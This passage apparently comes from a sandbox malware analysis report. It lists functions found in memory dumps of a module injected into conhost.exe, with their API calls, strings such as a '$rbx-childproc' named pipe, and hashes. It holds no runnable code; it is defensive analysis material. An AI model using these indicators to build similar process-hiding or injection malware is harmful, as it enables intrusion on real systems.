GetProcessHeap.KERNEL32 ref: 0000026504EA358D
HeapFree.KERNEL32 ref: 0000026504EA359B

Strings

\GPU Engine(*)\Utilization Percentage, xrefs: 0000026504EA3559

Memory Dump Source

Source File: 00000025.00000002.2728044722.0000026504EA1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000026504EA0000, based on PE: true

Associated: 00000025.00000002.2727985736.0000026504EA0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2728106310.0000026504EB5000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2728166738.0000026504EC0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2728224819.0000026504EC2000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2728282868.0000026504EC9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_37_2_26504ea0000_conhost.jbxd

Similarity

API ID: Heap$CounterInfoProcess$AllocFree
String ID: \GPU Engine(*)\Utilization Percentage
API String ID: 1943346504-3507739905
Opcode ID: 4dfb6054f5336d4a701c3ca7a3d18610e9584f8b2694925bec2ac2df63a9e25f
Instruction ID: fcbcc7ff0caf07b780afa72e6d2acfabb61f0d367d9b4d0bad41c24aa32f53e3
Opcode Fuzzy Hash: 4dfb6054f5336d4a701c3ca7a3d18610e9584f8b2694925bec2ac2df63a9e25f
Instruction Fuzzy Hash: 79318031A10F62DAEB51DF26A88C75AA3E0F78CF98F444125DE4A43724EF39D456C741

Function 0000026504E7962C Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 310COMMON

Download Yara Rule

APIs

__FrameHandler3::GetHandlerSearchState.LIBVCRUNTIME ref: 0000026504E79689

Part of subcall function 0000026504E7A544: __GetUnwindTryBlock.LIBCMT ref: 0000026504E7A587
Part of subcall function 0000026504E7A544: __SetUnwindTryBlock.LIBVCRUNTIME ref: 0000026504E7A5AC

Is_bad_exception_allowed.LIBVCRUNTIME ref: 0000026504E79761
__FrameHandler3::ExecutionInCatch.LIBVCRUNTIME ref: 0000026504E799AF
std::bad_alloc::bad_alloc.LIBCMT ref: 0000026504E79ABC

Strings

csm, xrefs: 0000026504E7970A
csm, xrefs: 0000026504E79784
csm, xrefs: 0000026504E796A3

Memory Dump Source

Source File: 00000025.00000003.2595945338.0000026504E70000.00000040.00000400.00020000.00000000.sdmp, Offset: 0000026504E70000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_37_3_26504e70000_conhost.jbxd

Similarity

API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
String ID: csm$csm$csm
API String ID: 849930591-393685449
Opcode ID: 99dcd42e55987f84e0a9dbea2fa1ae191c477915d496a4e3a9a042af50ac5220
Instruction ID: 6fdfba3c2dc8d2af56ec7303eebf260b500bdbada1b01f2e8dafe867669d4c93
Opcode Fuzzy Hash: 99dcd42e55987f84e0a9dbea2fa1ae191c477915d496a4e3a9a042af50ac5220
Instruction Fuzzy Hash: 82D1C372600FA2CAFB60DF65D68939E77A0FB5D7A8F100115EE8957B9ADB35C081C702

Function 0000026504EAA22C Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 310
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__FrameHandler3::GetHandlerSearchState.LIBVCRUNTIME ref: 0000026504EAA289

Part of subcall function 0000026504EAB144: __GetUnwindTryBlock.LIBCMT ref: 0000026504EAB187
Part of subcall function 0000026504EAB144: __SetUnwindTryBlock.LIBVCRUNTIME ref: 0000026504EAB1AC

Is_bad_exception_allowed.LIBVCRUNTIME ref: 0000026504EAA361
__FrameHandler3::ExecutionInCatch.LIBVCRUNTIME ref: 0000026504EAA5AF
std::bad_alloc::bad_alloc.LIBCMT ref: 0000026504EAA6BC

Strings

csm, xrefs: 0000026504EAA384
csm, xrefs: 0000026504EAA30A
csm, xrefs: 0000026504EAA2A3

Memory Dump Source

Source File: 00000025.00000002.2728044722.0000026504EA1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000026504EA0000, based on PE: true

Associated: 00000025.00000002.2727985736.0000026504EA0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2728106310.0000026504EB5000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2728166738.0000026504EC0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2728224819.0000026504EC2000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2728282868.0000026504EC9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_37_2_26504ea0000_conhost.jbxd

Similarity

API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
String ID: csm$csm$csm
API String ID: 849930591-393685449
Opcode ID: 037bd7d014dbf073bd717ac1516acd742bbf86a7991252edd6e45b1783c3a634
Instruction ID: f754cd92e2b8a869d11258ae4f09425d123b0552bd0093c4dce3dd0db0e896a8
Opcode Fuzzy Hash: 037bd7d014dbf073bd717ac1516acd742bbf86a7991252edd6e45b1783c3a634
Instruction Fuzzy Hash: B2D1D372604FA2CAEB20DF65D4483AD37A0F79D788F140525EE8957B96CF35E4A4CB02

Function 0000026504EA104C Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 99
memoryregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegQueryInfoKeyW.ADVAPI32 ref: 0000026504EA10B1
RegEnumValueW.ADVAPI32 ref: 0000026504EA1117
GetProcessHeap.KERNEL32 ref: 0000026504EA115A
HeapAlloc.KERNEL32 ref: 0000026504EA1168
GetProcessHeap.KERNEL32 ref: 0000026504EA1185
HeapFree.KERNEL32 ref: 0000026504EA1193

Strings

d, xrefs: 0000026504EA10D6

Memory Dump Source

Source File: 00000025.00000002.2728044722.0000026504EA1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000026504EA0000, based on PE: true

Associated: 00000025.00000002.2727985736.0000026504EA0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2728106310.0000026504EB5000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2728166738.0000026504EC0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2728224819.0000026504EC2000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2728282868.0000026504EC9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_37_2_26504ea0000_conhost.jbxd

Similarity

API ID: Heap$Process$AllocEnumFreeInfoQueryValue
String ID: d
API String ID: 3743429067-2564639436
Opcode ID: 214df63eb12f5006524d9de65027155270ac54fbc8f89443ffbfb24959d92ecf
Instruction ID: 2b9334750b88fd1a2d9f5598a10256c2816d7cec60fb40f5525cc47196f0a263
Opcode Fuzzy Hash: 214df63eb12f5006524d9de65027155270ac54fbc8f89443ffbfb24959d92ecf
Instruction Fuzzy Hash: 2F417073214F95DAE760CF21E44839EB7A1F388B9CF448229DA8907758DF39D459CB41

Function 0000026504EA2518 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 44
filethreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcessIdOfThread.KERNEL32 ref: 0000026504EA252D
GetCurrentProcessId.KERNEL32 ref: 0000026504EA2537
CreateFileW.KERNEL32 ref: 0000026504EA2568
WriteFile.KERNEL32 ref: 0000026504EA2590
ReadFile.KERNEL32 ref: 0000026504EA25AF
CloseHandle.KERNEL32 ref: 0000026504EA25B8

Strings

\\.\pipe\$rbx-childproc, xrefs: 0000026504EA2549

Memory Dump Source

Source File: 00000025.00000002.2728044722.0000026504EA1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000026504EA0000, based on PE: true

Associated: 00000025.00000002.2727985736.0000026504EA0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2728106310.0000026504EB5000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2728166738.0000026504EC0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2728224819.0000026504EC2000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2728282868.0000026504EC9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_37_2_26504ea0000_conhost.jbxd

Similarity

API ID: File$Process$CloseCreateCurrentHandleReadThreadWrite
String ID: \\.\pipe\$rbx-childproc
API String ID: 166002920-1828357524
Opcode ID: 2f0528e3c87d94e1cfa1c202f0bfd1f6cfafc65532576ba32c2772f85af7f427
Instruction ID: 0f1d856c1ac42f33e9e1fd6cc5512d6db6fc7ffd67ec0a265cf2603c61a9615a
Opcode Fuzzy Hash: 2f0528e3c87d94e1cfa1c202f0bfd1f6cfafc65532576ba32c2772f85af7f427
Instruction Fuzzy Hash: 4B113732618F51D2E710CF21F45835A7760F389B98F940215EA9902BA8DF3EC149CB82

Function 0000026504E77050 Relevance: 12.2, APIs: 8, Instructions: 227COMMON

Download Yara Rule

APIs

__scrt_dllmain_crt_thread_attach.LIBCMT ref: 0000026504E77078
__scrt_acquire_startup_lock.LIBCMT ref: 0000026504E770CA
_RTC_Initialize.LIBCMT ref: 0000026504E770F8
__scrt_dllmain_after_initialize_c.LIBCMT ref: 0000026504E7711E
__scrt_release_startup_lock.LIBCMT ref: 0000026504E77149

Memory Dump Source

Source File: 00000025.00000003.2595945338.0000026504E70000.00000040.00000400.00020000.00000000.sdmp, Offset: 0000026504E70000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_37_3_26504e70000_conhost.jbxd

Similarity

API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
String ID:
API String ID: 190073905-0
Opcode ID: 53754b190eade9ddf9a12de580ea1969ce11fb76c0c5d26610c7ca44f503f6dd
Instruction ID: 8327473b320bef1b67460e22e3611c8473c1a9285d79da5433940e764a47adc7
Opcode Fuzzy Hash: 53754b190eade9ddf9a12de580ea1969ce11fb76c0c5d26610c7ca44f503f6dd
Instruction Fuzzy Hash: 6281C530700E73C6FB54EB659A4936B22D1AB8E7A0F1541299E48477D6EB3BE846C703

Function 0000026504EA7C50 Relevance: 12.2, APIs: 8, Instructions: 227
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__scrt_dllmain_crt_thread_attach.LIBCMT ref: 0000026504EA7C78
__scrt_acquire_startup_lock.LIBCMT ref: 0000026504EA7CCA
_RTC_Initialize.LIBCMT ref: 0000026504EA7CF8
__scrt_dllmain_after_initialize_c.LIBCMT ref: 0000026504EA7D1E
__scrt_release_startup_lock.LIBCMT ref: 0000026504EA7D49

Memory Dump Source

Source File: 00000025.00000002.2728044722.0000026504EA1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000026504EA0000, based on PE: true

Associated: 00000025.00000002.2727985736.0000026504EA0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2728106310.0000026504EB5000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2728166738.0000026504EC0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2728224819.0000026504EC2000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2728282868.0000026504EC9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_37_2_26504ea0000_conhost.jbxd

Similarity

API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
String ID:
API String ID: 190073905-0
Opcode ID: 53754b190eade9ddf9a12de580ea1969ce11fb76c0c5d26610c7ca44f503f6dd
Instruction ID: 09756a7049fddb3f02e2534623170ce81d51eff92d7d0199020d1d80e156250a
Opcode Fuzzy Hash: 53754b190eade9ddf9a12de580ea1969ce11fb76c0c5d26610c7ca44f503f6dd
Instruction Fuzzy Hash: C6810730700F73C6FB54EB65944D3A967E0BB8E784F5481259A4847397DB3BE9668303

Function 0000026504EA9AAC Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 88
libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryExW.KERNEL32(?,?,?,0000026504EA9C6B,?,?,?,0000026504EA945C,?,?,?,?,0000026504EA8F65), ref: 0000026504EA9B31
GetLastError.KERNEL32(?,?,?,0000026504EA9C6B,?,?,?,0000026504EA945C,?,?,?,?,0000026504EA8F65), ref: 0000026504EA9B3F
LoadLibraryExW.KERNEL32(?,?,?,0000026504EA9C6B,?,?,?,0000026504EA945C,?,?,?,?,0000026504EA8F65), ref: 0000026504EA9B69
FreeLibrary.KERNEL32(?,?,?,0000026504EA9C6B,?,?,?,0000026504EA945C,?,?,?,?,0000026504EA8F65), ref: 0000026504EA9BD7
GetProcAddress.KERNEL32(?,?,?,0000026504EA9C6B,?,?,?,0000026504EA945C,?,?,?,?,0000026504EA8F65), ref: 0000026504EA9BE3

Strings

api-ms-, xrefs: 0000026504EA9B51

Memory Dump Source

Source File: 00000025.00000002.2728044722.0000026504EA1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000026504EA0000, based on PE: true

Associated: 00000025.00000002.2727985736.0000026504EA0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2728106310.0000026504EB5000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2728166738.0000026504EC0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2728224819.0000026504EC2000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2728282868.0000026504EC9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_37_2_26504ea0000_conhost.jbxd

Similarity

API ID: Library$Load$AddressErrorFreeLastProc
String ID: api-ms-
API String ID: 2559590344-2084034818
Opcode ID: 71d948750e90526cf3ff779f44d5551170106daf63fa61af0dbf03442d3e65c3
Instruction ID: 82a76a632d64eac1c440c445a8f0f6f00ae8c437e62dac08ec36b8af10f282e3
Opcode Fuzzy Hash: 71d948750e90526cf3ff779f44d5551170106daf63fa61af0dbf03442d3e65c3
Instruction Fuzzy Hash: 1F31C371312E62D1EF12DB0698087A523D4BB4CBA4F590A25DD1D4B791DF3AE468C346

Function 0000026504EB3400 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48fileCOMMON

Download Yara Rule

APIs

WriteConsoleW.KERNEL32 ref: 0000026504EB3431
GetLastError.KERNEL32 ref: 0000026504EB343D
CloseHandle.KERNEL32 ref: 0000026504EB3455
CreateFileW.KERNEL32 ref: 0000026504EB3480
WriteConsoleW.KERNEL32 ref: 0000026504EB349F

Strings

CONOUT$, xrefs: 0000026504EB3461

Memory Dump Source

Source File: 00000025.00000002.2728044722.0000026504EA1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000026504EA0000, based on PE: true

Associated: 00000025.00000002.2727985736.0000026504EA0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2728106310.0000026504EB5000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2728166738.0000026504EC0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2728224819.0000026504EC2000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2728282868.0000026504EC9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_37_2_26504ea0000_conhost.jbxd

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
String ID: CONOUT$
API String ID: 3230265001-3130406586
Opcode ID: 42a144b3d0c2ce880bdd00bf22acff5208f3dd7a422955a941dc6bc7111c5e61
Instruction ID: c5d660311908992be06d6801525e124f5fd11bbf80be9e7abf098d7d4623eacd
Opcode Fuzzy Hash: 42a144b3d0c2ce880bdd00bf22acff5208f3dd7a422955a941dc6bc7111c5e61
Instruction Fuzzy Hash: DE116D31310F61C6E751CB96E85871A66A4F78CBE8F444224EE5E87B94CF7AC8088781

Function 0000026504EA6270 Relevance: 9.2, APIs: 6, Instructions: 240threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 0000026504EA62AB
GetThreadContext.KERNEL32 ref: 0000026504EA6415

Part of subcall function 0000026504EA60A0: GetCurrentThreadId.KERNEL32 ref: 0000026504EA60A4

Memory Dump Source

Source File: 00000025.00000002.2728044722.0000026504EA1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000026504EA0000, based on PE: true

Associated: 00000025.00000002.2727985736.0000026504EA0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2728106310.0000026504EB5000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2728166738.0000026504EC0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2728224819.0000026504EC2000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2728282868.0000026504EC9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_37_2_26504ea0000_conhost.jbxd

Similarity

API ID: Thread$Current$Context
String ID:
API String ID: 1666949209-0
Opcode ID: b08b5ce39edb43236479958ddd03c6d1f6838080b2cf9501a19bb2138673ce94
Instruction ID: 8c888550130b00d47dd261bdf4c5b903dc50ddf8a3177d7dd3d1a0fc6817e242
Opcode Fuzzy Hash: b08b5ce39edb43236479958ddd03c6d1f6838080b2cf9501a19bb2138673ce94
Instruction Fuzzy Hash: 15D1B776208F99C2DA70DB1AE49835AB7A0F3CDB88F140616EACD477A9CF39D551CB01

Function 0000026504EA2098 Relevance: 9.1, APIs: 6, Instructions: 113threadCOMMON

Download Yara Rule

APIs

GetCurrentThread.KERNEL32 ref: 0000026504EA20A6
TlsFree.KERNEL32 ref: 0000026504EA225F
TlsFree.KERNEL32 ref: 0000026504EA226B
TlsFree.KERNEL32 ref: 0000026504EA2277
TlsFree.KERNEL32 ref: 0000026504EA2283
TlsFree.KERNEL32 ref: 0000026504EA228F

Part of subcall function 0000026504EA5E50: GetCurrentThreadId.KERNEL32 ref: 0000026504EA5E66

Memory Dump Source

Source File: 00000025.00000002.2728044722.0000026504EA1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000026504EA0000, based on PE: true

Associated: 00000025.00000002.2727985736.0000026504EA0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2728106310.0000026504EB5000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2728166738.0000026504EC0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2728224819.0000026504EC2000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2728282868.0000026504EC9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_37_2_26504ea0000_conhost.jbxd

Similarity

API ID: Free$CurrentThread
String ID:
API String ID: 564911740-0
Opcode ID: d3c28f796396b1edcf9deeb44a5a84d122c2fcfc0f762368ef43e6e6c9edfbab
Instruction ID: 16cbdc8838f62f6ad5a2d1b0cb3a8c032031ac4f4b58e0534df5b7acec241159
Opcode Fuzzy Hash: d3c28f796396b1edcf9deeb44a5a84d122c2fcfc0f762368ef43e6e6c9edfbab
Instruction Fuzzy Hash: F551F930201F67D5EF09DF24E89869833A1FB0C748F844955AA2D077A6EF7AE539C742

Function 0000026504EA35C8 Relevance: 9.1, APIs: 5, Strings: 1, Instructions: 93memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(?,?,?,?,?,0000026504EA24D1), ref: 0000026504EA35EB
HeapAlloc.KERNEL32(?,?,?,?,?,0000026504EA24D1), ref: 0000026504EA35FE
StrCmpNIW.SHLWAPI(?,?,?,?,?,0000026504EA24D1), ref: 0000026504EA3673
GetProcessHeap.KERNEL32(?,?,?,?,?,0000026504EA24D1), ref: 0000026504EA36D9
HeapFree.KERNEL32(?,?,?,?,?,0000026504EA24D1), ref: 0000026504EA36E7

Strings

$rbx-, xrefs: 0000026504EA366C

Memory Dump Source

Source File: 00000025.00000002.2728044722.0000026504EA1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000026504EA0000, based on PE: true

Associated: 00000025.00000002.2727985736.0000026504EA0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2728106310.0000026504EB5000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2728166738.0000026504EC0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2728224819.0000026504EC2000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2728282868.0000026504EC9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_37_2_26504ea0000_conhost.jbxd

Similarity

API ID: Heap$Process$AllocFree
String ID: $rbx-
API String ID: 756756679-3661604363
Opcode ID: cf694f0bea780c6e1211edc3f081aa45b4316966585fdcbda0fb213a5a03d4f8
Instruction ID: 76a6ae1a01e32d411396f6e1adf6a4fcac8744be072a43a0876b9ee392b66efb
Opcode Fuzzy Hash: cf694f0bea780c6e1211edc3f081aa45b4316966585fdcbda0fb213a5a03d4f8
Instruction Fuzzy Hash: 63319032701F62D3EB55DF16E94876AA7A0FB88B84F0C48209F4907B55EF3AE4758741

Function 0000026504EAC940 Relevance: 9.1, APIs: 6, Instructions: 51COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32 ref: 0000026504EAC94F
SetLastError.KERNEL32 ref: 0000026504EAC96E
FlsSetValue.KERNEL32 ref: 0000026504EAC997
FlsSetValue.KERNEL32 ref: 0000026504EAC9A8
FlsSetValue.KERNEL32 ref: 0000026504EAC9B9

Part of subcall function 0000026504EAD2A0: HeapFree.KERNEL32(?,?,?,?,?,?,?,0000026504EA674A), ref: 0000026504EAD2B6
Part of subcall function 0000026504EAD2A0: GetLastError.KERNEL32(?,?,?,?,?,?,?,0000026504EA674A), ref: 0000026504EAD2C0

SetLastError.KERNEL32 ref: 0000026504EAC9DC

Memory Dump Source

Source File: 00000025.00000002.2728044722.0000026504EA1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000026504EA0000, based on PE: true

Associated: 00000025.00000002.2727985736.0000026504EA0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2728106310.0000026504EB5000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2728166738.0000026504EC0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2728224819.0000026504EC2000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2728282868.0000026504EC9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_37_2_26504ea0000_conhost.jbxd

Similarity

API ID: ErrorLast$Value$FreeHeap
String ID:
API String ID: 365477584-0
Opcode ID: 2b4934949d3deca667ae4771e81ed1922e44bbeb7fb5f4fb09c3a9f1576f5646
Instruction ID: 6e8a026b5cf63212b5ffff7024d8d325971e55c5b43bda475cc4df67c0d44ffa
Opcode Fuzzy Hash: 2b4934949d3deca667ae4771e81ed1922e44bbeb7fb5f4fb09c3a9f1576f5646
Instruction Fuzzy Hash: C611A931300F73C2FA54EB71781D3EE1252AB8D798F654624E866577D6DE3AE8218313

Function 0000026504EA1A30 Relevance: 9.0, APIs: 6, Instructions: 42stringCOMMON

Download Yara Rule

APIs

OpenProcess.KERNEL32 ref: 0000026504EA1A56
K32GetModuleFileNameExW.KERNEL32 ref: 0000026504EA1A74
PathFindFileNameW.SHLWAPI ref: 0000026504EA1A83
lstrlenW.KERNEL32 ref: 0000026504EA1A8F
StrCpyW.SHLWAPI ref: 0000026504EA1AA2
CloseHandle.KERNEL32 ref: 0000026504EA1AB0

Memory Dump Source

Source File: 00000025.00000002.2728044722.0000026504EA1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000026504EA0000, based on PE: true

Associated: 00000025.00000002.2727985736.0000026504EA0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2728106310.0000026504EB5000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2728166738.0000026504EC0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2728224819.0000026504EC2000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2728282868.0000026504EC9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_37_2_26504ea0000_conhost.jbxd

Similarity

API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
String ID:
API String ID: 517849248-0
Opcode ID: 3678c02db6aac465212181e8004412cbf2c2ed21259821feedd311f468bba618
Instruction ID: 761087416abc80b15684c0f9cc0b178824dec605f95b8abd615ab026bd770e38
Opcode Fuzzy Hash: 3678c02db6aac465212181e8004412cbf2c2ed21259821feedd311f468bba618
Instruction Fuzzy Hash: 28011731704F52D6EA54DB12A85835AA3A1FB8CFC4F884135DE9D43754DE3AC98AC781

Function 0000026504EA3E14 Relevance: 9.0, APIs: 6, Instructions: 38threadCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(?,?,?,?,?,0000026504EA3AAC), ref: 0000026504EA3E30
GetCurrentProcess.KERNEL32(?,?,?,?,?,0000026504EA3AAC), ref: 0000026504EA3E3E
VirtualProtectEx.KERNEL32(?,?,?,?,?,0000026504EA3AAC), ref: 0000026504EA3E60
GetCurrentProcess.KERNEL32(?,?,?,?,?,0000026504EA3AAC), ref: 0000026504EA3E7E
VirtualProtectEx.KERNEL32(?,?,?,?,?,0000026504EA3AAC), ref: 0000026504EA3E9F
TerminateThread.KERNEL32(?,?,?,?,?,0000026504EA3AAC), ref: 0000026504EA3EAE

Memory Dump Source

Source File: 00000025.00000002.2728044722.0000026504EA1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000026504EA0000, based on PE: true

Associated: 00000025.00000002.2727985736.0000026504EA0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2728106310.0000026504EB5000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2728166738.0000026504EC0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2728224819.0000026504EC2000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2728282868.0000026504EC9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_37_2_26504ea0000_conhost.jbxd

Similarity

API ID: CurrentProcessProtectVirtual$HandleModuleTerminateThread
String ID:
API String ID: 449555515-0
Opcode ID: cded63a883f53769b64ee8603978d746ac0fde6b870154241cf5f6bb9e490f61
Instruction ID: f8c2d19afdb82e746293e52d993757baa6165dfebb384c54689a4b9fc74cd54b
Opcode Fuzzy Hash: cded63a883f53769b64ee8603978d746ac0fde6b870154241cf5f6bb9e490f61
Instruction Fuzzy Hash: 39011775615F62C2EB64DF25E84C71A62A0AB4CB89F044028DE4D063A5EF3EC4588742

Function 0000026504EA1AD4 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 30stringCOMMON

Download Yara Rule

APIs

GetFinalPathNameByHandleW.KERNEL32 ref: 0000026504EA1AF4
StrCmpNIW.SHLWAPI ref: 0000026504EA1B0E
lstrlenW.KERNEL32 ref: 0000026504EA1B1D
StrCpyW.SHLWAPI ref: 0000026504EA1B32

Strings

\\?\, xrefs: 0000026504EA1B02

Memory Dump Source

Source File: 00000025.00000002.2728044722.0000026504EA1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000026504EA0000, based on PE: true

Associated: 00000025.00000002.2727985736.0000026504EA0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2728106310.0000026504EB5000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2728166738.0000026504EC0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2728224819.0000026504EC2000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2728282868.0000026504EC9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_37_2_26504ea0000_conhost.jbxd

Similarity

API ID: FinalHandleNamePathlstrlen
String ID: \\?\
API String ID: 2719912262-4282027825
Opcode ID: effff3530f1f25e22f57eaf43e9f5b9d86630ec4a353fbe38ed28e1154ec946c
Instruction ID: c90dd2b691fd84445c3d88584826e080a68923eb08f8bca6788a8dfac5923b53
Opcode Fuzzy Hash: effff3530f1f25e22f57eaf43e9f5b9d86630ec4a353fbe38ed28e1154ec946c
Instruction Fuzzy Hash: 13F04472304E96D2E760CB21F59835AA361F748B8CFC84025DA4946A58DE7DC65DCB41

Function 0000026504EA3708 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 27COMMON

Download Yara Rule

APIs

StrCmpIW.SHLWAPI(?,?,00000000,0000026504EA275A), ref: 0000026504EA372A
